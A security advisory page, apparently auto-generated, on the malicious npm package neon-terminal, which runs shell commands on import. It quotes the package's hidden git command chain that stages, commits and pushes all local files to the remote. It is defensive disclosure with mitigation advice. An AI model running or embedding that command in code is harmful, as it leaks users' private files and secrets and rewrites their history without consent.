MAL-2026-6793: Malicious code in neon-terminal (npm)
The neon-terminal npm package contains malicious code that executes shell commands immediately upon being imported or required. This code runs git commands in the user's current directory, automatically staging all files, committing them with a generic message, and pushing the commit to the configured remote repository. This behavior is undocumented and unrelated to the package's advertised function as an ANSI color helper. The malicious actions can lead to unauthorized commits, exfiltration of local files including sensitive data, and unwanted changes to git history.
AI Analysis
Technical Summary
The neon-terminal package versions 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, and 0.9.0 contain malicious code that executes a shell command at the top level of its CommonJS and ESM entry points. This command runs `pwd && ls -la && git status && git add . && git commit -m "sync" && git push -u origin main` in the consumer's current working directory. When used inside a git repository, this results in automatic staging, committing, and pushing of all local files, including untracked or uncommitted files, potentially exposing secrets or in-progress code. The commits are made under the installer's git identity without consent, causing unauthorized repository changes and potential data exfiltration. This behavior is not documented or gated and is unrelated to the package's stated purpose.
Potential Impact
Unauthorized commits are created in the user's git repository under their identity, potentially exposing sensitive or secret files that were previously uncommitted. The malicious push to the remote repository can lead to data exfiltration to public or third-party repositories. Additionally, the git history and branch state can be altered without the user's consent, which may disrupt development workflows or cause data integrity issues.
Mitigation Recommendations
No official patch or remediation is currently documented for this malicious package. Users should avoid installing or importing the affected versions of neon-terminal. Audit existing repositories for unauthorized commits and remote pushes. Remove the neon-terminal package from projects and replace it with trusted alternatives. Monitor git history for unexpected changes. Patch status is not yet confirmed — check the vendor advisory or trusted sources for updates.
MAL-2026-6793: Malicious code in neon-terminal (npm)
Description
The neon-terminal npm package contains malicious code that executes shell commands immediately upon being imported or required. This code runs git commands in the user's current directory, automatically staging all files, committing them with a generic message, and pushing the commit to the configured remote repository. This behavior is undocumented and unrelated to the package's advertised function as an ANSI color helper. The malicious actions can lead to unauthorized commits, exfiltration of local files including sensitive data, and unwanted changes to git history.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The neon-terminal package versions 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, and 0.9.0 contain malicious code that executes a shell command at the top level of its CommonJS and ESM entry points. This command runs `pwd && ls -la && git status && git add . && git commit -m "sync" && git push -u origin main` in the consumer's current working directory. When used inside a git repository, this results in automatic staging, committing, and pushing of all local files, including untracked or uncommitted files, potentially exposing secrets or in-progress code. The commits are made under the installer's git identity without consent, causing unauthorized repository changes and potential data exfiltration. This behavior is not documented or gated and is unrelated to the package's stated purpose.
Potential Impact
Unauthorized commits are created in the user's git repository under their identity, potentially exposing sensitive or secret files that were previously uncommitted. The malicious push to the remote repository can lead to data exfiltration to public or third-party repositories. Additionally, the git history and branch state can be altered without the user's consent, which may disrupt development workflows or cause data integrity issues.
Mitigation Recommendations
No official patch or remediation is currently documented for this malicious package. Users should avoid installing or importing the affected versions of neon-terminal. Audit existing repositories for unauthorized commits and remote pushes. Remove the neon-terminal package from projects and replace it with trusted alternatives. Monitor git history for unexpected changes. Patch status is not yet confirmed — check the vendor advisory or trusted sources for updates.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6793
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["npm"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a4c348927e9c79719607939
Added to database: 07/06/2026, 23:04:41 UTC
Last enriched: 07/06/2026, 23:41:38 UTC
Last updated: 07/06/2026, 23:41:38 UTC
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.